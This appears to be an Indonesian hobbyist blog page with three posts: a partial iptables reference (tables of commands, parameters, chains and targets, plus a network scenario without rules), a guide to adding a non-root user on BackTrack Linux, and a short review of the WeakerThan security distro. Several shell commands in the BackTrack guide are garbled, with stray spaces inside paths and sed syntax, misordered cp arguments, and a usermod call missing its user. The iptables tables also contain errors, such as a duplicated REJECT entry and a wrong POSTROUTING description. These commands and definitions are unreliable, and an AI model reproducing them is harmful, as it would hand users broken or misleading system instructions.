-N atau –new-chain Melakukan penambahan chain baru
-X atau –delete-chain Melakukan penghapusan chain
-P atau –policy Memberikan rule standard
-E atau –rename Memberikan penggantian nama
-h atau –help Menampilkan fasilitas help
Table 1. Table Command iptables
Parameter
Parameter iptables digunakan sebagai pelengkap yang diperlukan untuk tujuan spesifikasi rule tersebut
Parameter berikut Keterangan
-p, –protocol (proto) Parameter ini untuk menentukan perlakuan terhadap protokol
-s, –source (address) –-src Parameter untuk menentukan asal paket
-d, –destination (address) –-dst Parameter untuk menentukan tujuan paket
-j, –jump (target)
-g, –goto (chain)
-i, –in-interface Masuk melalui interface (eth0, eth1 dst)
-o, –out-interface
[!] -f, –fragment
-c, –set-counters
Table 2. Tabel Parameter iptables
Parameter berikut Keterangan
–sport
–source-port Menentukan port asal
–dport
–destination-port Menentukan port tujuan
–tcp-flags Menentukan perlakuan datagram
–syn
Table 3. Tabel Parameter detail
Selanjutnya apa itu yang disebut dengan chain?
Chain/rantai digambarkan sebagai jalur aliran data. Chains yang diperlukan untuk iptables ini antara lain:
Chain berikut Keterangan
FORWARD Route packet akan di FORWARD tanpa di proses lanjut di local
INPUT Route packet masuk ke dalam proses lokal sistem
OUTPUT Route packet keluar dari local sistem
PREROUTING Chain yang digunakan untuk keperluan perlakuan sebelum packet masuk route. Biasanya dipakai untuk proses NAT
POSTROUTING Chain yang digunakan untuk keperluan perlakuan sesudah packet masuk route. Biasanya dipakai untuk proses NAT
Tabel 4. Tabel Chain
Chain PREROUTING dan POSTROUTING dimaksudkan sebagai jalur data sebelum dan sesudah data tersebut masuk ke dalam route.
PREROUTING: data sebelum masuk jalur route, akan di kenakan rule
POSTROUTING: data sebelum masuk akan dikenakan route
Apakah target itu?
Target adalah tujuan perlakuan terhadap rule. Pada target ini terletak keputusan, paket data mau diapakan, apakah mau di tolak, atau diteruskan atau diolah terlebih dahulu. Berikut daftar table target iptables
Target berikut Keterangan
ACCEPT Rantai paket tersebut diterima dalam rule
DROP Rantai paket tersebut “dijatuhkan”
REJECT Rantai paket tersebut ditolak seperti DROP
DNAT Rantai paket di “destination nat” kan ke address lain
SNAT Rantai paket di arahkan ke source nat tertentu
REDIRECT Rantai paket di redirect ke suatu addres dan port tertentu
MASQUERADE Bekerja seperti SNAT tapi tidak memerlukan source
REJECT Bekerja seperti DROP
Contoh beberapa kasus untuk iptables
Misalkan terdapat sebuah jaringan komputer menggunakan koneksi internet dengan IP ADDRESS publik
222.124.132.91 (eth0)
Server gateway memiliki 3 anak jaringan (jaringan lokal) dengan dibedakan subnet
192.168.0.0/24 (eth1)
192.168.1.0/24 (eth2)
192.168.10.0/24 (eth3)
Kondisi dalam jaringan, eth3 tidak diperbolehkan melakukan akses ke internet tetapi diperbolehkan masuk ke jaringan lokal lainnya melalui protokol http. Sedangkan eth1 dan eth2 diperbolehkan melakukan akses ke internet. Pada IP ADDRESS 192.168.1.10 terdapat webserver, dan pada IP Address 192.168.1.12 terdapat koleksi intranet yang akan dipublish ke internet. Disamping itu, koneksi internet 1 mega tersebut akan di share, untuk semua komputer di eth2 akan dibatasi pemakaiannya maksimal 10kbps.
semoga bermanfaat..
source : http://bodhon.wordpress.com/

./adduser on backtrack


mungkin bagi sebagian besar orang menambahkan user di linux adalah hal yang sangat di butuhkan...:)
tapi tidak untuk backtrack linux..
justru dengan adanya user yang baru malah akan merepotkan pekerjaan kita di backtrack...
kenapa????
ini di karenakan hampir 90 % aplikasi yang ada di backtrack memang harus di jalankan sebagai super user (root)
kemudian backtrack di rancang untuk melakukan penetrasi terhadap keamanan internet..
tidak kebayang jika saat melakukan pentest dengan user biasa..kemuadian ada serangan balik..& penyerang memanfaatkan user root kita.
namun..tidak selamanya kita melakukan pentest terus-terusan setiap hari...heee....
ada kalanya backtrack di gunakan seperti linux kebanyakan..mungkin kebutuhan mengetik,bermain2 dengan tapilan..dan lain-lain..
& mungkin ada aplikasi yang tidak bisa di jalankan sebagai root..
kita ambil contoh teamviewer..ini tidak bisa di jalankan sebagai root kalo di backtrack jadi tetap di butuhkan user biasa yang bukan root
untuk menjalankannya..
baiklah sekarang langsung saja..
==================================================================================
perintah ini akan memberikan menu baru untuk user
root@bt:~# cp .config/menus/applications-kmenuedit.menu /etc/skel/.config/menus/
Perintah-perintah ini mengatur folder desktop untuk pengguna baru ke / home / / desktop dan memastikan bahwa folder yang ada di direktori home user:
root @ bt: ~ # sed-'s / XDG_DESKTOP_DIR = "$ HOME \ /" / XDG_DESKTOP_DIR = "$ HOME \ / desktop" /' i / etc / skel / .config / user-dirs.dirs
root @ bt: ~ # mkdir / etc / skel / desktop
Perintah ini menetapkan wallpaper desktop yang bagus untuk user baru
root @ bt: ~ # sed-s i '/ Wallpaper \ [\ $ e \] = \ / opt \ / KDE3 \ / share \ / wallpaper \ / origin2.jpg/Wallpaper \ [\ $ e \] = \ / opt \ / KDE3 \ / share \ / wallpaper \ / bt4.png / '/ etc/skel/.kde3/share/config/kdesktoprc
perintah ini akan mengatur icon naga di menu
root @ bt: ~ # .kde3/share/icons/nuvoX_0.7/kmenu-dragon.zip cp / etc/skel/.kde3/share/icons/nuvoX_0.7 /
root @ bt: ~ # unzip-ou .kde3/share/icons/nuvoX_0.7/kmenu-dragon.zip-d / etc/skel/.kde3/share/icons/nuvoX_0.7 /
kemudian salin beberapa konfigurasi file jika di perlukan
root@bt:~# cp -R /root/{.wine,.conky_scripts,.liferea_1.4,.gem} /etc/skel/
===================================================================================
Sekarang / etc / skel sudah dikonfigurasi dengan benar..kita bisa menambahkan user baru sekarang
root @ bt: ~ # adduser
sebagai contoh..
root@bt:~# adduser yur4
Adding user `yur4' ...
Adding new group `yur4' (1000) ...
Adding new user `yur4' (1000) with group `yur4' ...
Creating home directory `/home/yur4' ...
Copying files from `/etc/skel' ...
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
Changing the user information for yur4
Enter the new value, or press ENTER for the default
Full Name []: yur4
Room Number []:
Work Phone []:
Home Phone []:
Other []:
Is the information correct? [Y/n] y
ukey...
sekarang masukan perintah agar kita bisa menjalankan card audio,device disk,& cd room
root @ bt: ~ # usermod - group admin, disk, cdrom, audio
nach jika sudah selesai..restart computer anda..
& login lach sebagai user yang baru di buat tadi...
semoga berhasil...:)
sumber : http://www.backtrack-linux.org/forums/
regards yur4kh4

WEAKERTHAN2 (security network OS)


WEAKERTHAN adalah distro yang di kembangkan oleh team weaknet labs di bawah pimpinan
~Douglas. (a.k.a. Trevelyn), kalau di lihat-lihat distro yang satu ini di khususkan untuk
para admin networking..bukan berarti newbie-newbie seperti kita ga boleh pake lo..heee
karena kalau kita lihat tools-tools yang di sertakan di dalam
distro ini rata-rata memang untuk menguji dan mengamankan jaringan, meskipun ada beberapa
tools web hacking :p. namun tidak begitu kental...
tidak seperti distro pentest kebanyakan yang sering kita temui disto yang satu ini
menggunakan tools-tools yang berbeda dengan yang lainnya...:)
menariknya lagi..release distro yang di buat dengan basic dasar ubuntu 10.4 ini memiliki
kecepatan yang tinggi..pada saat bootingnya..bahkan saat penulis mencoba menjalankan
weaknet di live USB, tidak ada prosess booting yg terlihat..:D
dalam hitungan 3 sd 4 detik, kita sudah bisa menjumpai desktop distro yang satu ini..
namun meskipun merupakan remaster dari ubuntu 10.4 penggunaanya tidak semudah ubuntu 10.4
jika pada ubuntu 10.4 kita menjumpai banyak kemudahan dalam mengoperasikan operating systemny
maka weaknet ini justru sebaliknya...
kita akan berhadapan terus dengan yang namanya terminal..
kebanyakan aplikasi yang di install di distro ini menggunakan terminal sebagai media untuk menjalankannya
seperti menjalankan
xchat yang di ganti dengan irssi
nautilus yang di gandeng dengan MC
rythombox yang di ganti dengan xmms/mp3blaster
dan lain sebagainya..:)

untuk teman-teman yang ingin mencicipi distro yang satu ini silahkan download di

http://weaknetlabs.com/weaknet/download/weakerthan.html

sebenarnya team dari pengembang distro ini tidak menganjurkan OS ini untuk di install di hardisk
itu di karenakan masi ada bugs pada file ubiquitynya (installernya) namun hal itu masih bisa di atasi :)
kemudian pada file grubnya juga terdapat bugs, saya sarankan jangan gunakan grub dari weaknet untuk di pasang di
MBR..sialhkan di setting di advance saat proses installasi bagian akhir
silahkan googleing sajha..
jika mendapatkan kesulitan dalam proses installasi silahkan kontak saya..:)

 g0o0...open source...
go0o..unix

regards yur4kh4
    Malang cyber crew